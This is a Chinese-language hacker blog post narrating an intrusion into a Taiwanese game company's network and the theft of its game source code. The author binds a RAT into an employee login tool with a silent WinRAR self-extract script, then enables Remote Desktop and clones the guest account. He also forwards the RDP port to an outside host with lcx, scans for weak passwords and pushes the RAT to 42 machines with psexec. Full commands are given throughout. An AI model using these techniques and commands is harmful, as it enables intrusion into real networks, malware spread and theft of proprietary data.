作者:教主
前言:
这篇文章所讲到的渗透思路以及方法适合各位新手和老鸟参考。通过入侵WEB服务器然后进行渗透到游戏
公司内部并获取游戏源代码全过程。这次是一次非常顺利的渗透过程,仅限学习参考。
-----------------------------------------------------第一天-------------------------------------------------------------------
花了3天时间终于拿下了
www.xxx.com.tw 的网站服务器.是一款不错的游戏产品.在服务器上找了
大半天找不出一点有用的信息.正准备放弃的时候看到 Ftp文件夹下有一个 员工专用登录器.exe 的程序.
HOHO~觉得有戏。。觉得管理员一定会用这个东西来干嘛..马上把这个东西down到自己的电脑,打开一看原来是游戏管理工具。想了一下这对我也没有什么用啊,唉。不如把马捆到这个上然后替换服务器上的原程序看看管理员会不会下载执行吧。
到网上搜了一个EXE图标提取器,把员工专用登录器.exe的程序图标提取出来。然后用黑洞1.96配了个服务端,花了点时间做了免杀。OK。用Winrar的自释放模式把员工专用登录器.exe和黑洞服务端捆绑在了一起。并传到服务器上覆盖了原来的程序。
;下面的注释自解压脚本命令
Path=%SystemRoot%\
SavePath
Setup=install.exe
Setup=Server.exe
Silent=1
Overwrite=2
-----------------------------------------------------第二天-------------------------------------------------------------------
中午起床后打开黑洞,HOHO果然不出各位的所料。。上线一台 台湾地区的主机。网络类型:内网,WindowsXp 系统。打开屏幕监视..果然就是客服部电脑。正在处理玩家的盗号申诉呢。
我立刻找到在我电脑沉睡已久的Tools3389.exe 传到对方机器。
打开Telnet
c:\tmp\tools3389.exe
运行参数:
无参数 帮助信息[本页]
-O 打开超级终端
-X [端口] 修改终端端口
-K 查看终端服务状态
-C 克隆GUEST账号
-S 查看系统版本
-T XP支持双用户登录
-R 重新启动计算机
-H 帮助信息[本页]
目前终端端口为:3389
c:\tmp\tools3389.exe –O 3389
接着c:\tmp\tools3389.exe –T
----------------------------------------------------------------------------------------------------
接下来大家都知道我要做什么了,就是转发3389端口出来渗透内网。找到lcx.exe
cmd: c:\tmp\lcx.exe –slave xxx.xxx.xxx.xxx 51 127.0.0.1 3389
呵呵,一切是那么的顺利。。熟悉的xp登陆画面就出来了。
克隆了guest帐号登陆。穿了个NT弱口令扫描器到肉鸡里。
net view 看了一下结果发现有4个网段。
用弱口令扫描器扫了全部的网段,结果如下:
1433 Sa 弱口令 17 台
NT-SERVER 弱口令 53 台
内网的安全做的就是差劲。。。。。。
----------------------------------------------------------------------------------------------------
拉了个psexec.exe 然后把我的黑洞服务段也传到肉鸡的c:\tmp目录下。。
经过1个多小时的重复操作:
cmd c:\tmp\psexec.exe \\192.168.5.X –u administrator –p 123456 –c Server.exe –d
成功上线的肉鸡有42台。
发现192.168.254.X 这个段的机器中了黑洞也不上线,很是纳闷。。于是判断下这个段到底能不能连接外网。
psexec \\192.168.254.20 –u administrator –p 123456 cmd
ping
www.google.com 结果不出所料。。果然不能连接外网。
这个段到底有什么重要的资料?还不能连接外网呢?在肉鸡上打开3389登录器
连接 192.168.254.20 哇塞。发现一个域 SrcServer 肯定是开发部的域了。还好没有限制内网终端连接。
花了2个多小时翻遍了254这个段的机器。终于发现了游戏的源代码。整整7个G啊。
立刻打包: 7z.exe –a tzip gamesrc.zip “c:\src” 打包时间真的的太久了。剩余3个多小时。。。
闲逛一下客服部的网段,发现一个网上邻居的共享文件夹 [FileServer] 看到了一个内网通的聊天软件安装端。。如法炮制捆绑上黑洞。。
接着就把游戏源代码拖到了电脑。。。
当前位置:
